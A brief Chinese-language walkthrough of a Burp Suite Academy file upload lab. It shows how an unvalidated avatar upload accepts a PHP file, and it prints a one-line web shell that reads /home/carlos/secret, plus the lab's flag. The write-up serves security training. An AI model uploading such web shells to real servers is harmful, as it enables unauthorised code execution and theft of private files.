bp官方靶场File upload vulnerabilities 文件上传漏洞1

第一关 通过 Web shell 木马文件上传进行远程执行代码

这一关就是在文件头像上传功能点存在一个不会对用户上传的文件执行任何验证，导致攻击者上传一个恶意php木马文件获取用户敏感信息

提示：1、靶场包含易受攻击的图片上传功能

2、在将用户上传的文件存储在服务器的文件系统上之前，它不会对用户上传的文件执行任何验证。

3、请上传一个基本的 PHP Web shell 并使用它来窃取文件 /home/carlos/secret 的内容

具体操作：

1、正常登录用户wiener，选择图片上传头像

2、跳转到头像图片文件上传成功的页面

然后返回我的账户页面，查看下上传的头像

3、接下来利用头像上传功能，上传一个一句话木马恶意的php文件

创建一个恶意文件：exploit.php

文件里填写获取carlos用户秘钥的恶意执行代码：

<?php echo file_get_contents('/home/carlos/secret'); ?>

如图：上传成功

找到触发的数据包

获取carlos用户秘钥：

0boRDyl3WcyTdHiSDbjTIS0NHA289DeC

如图：提交秘钥答案，靶场过关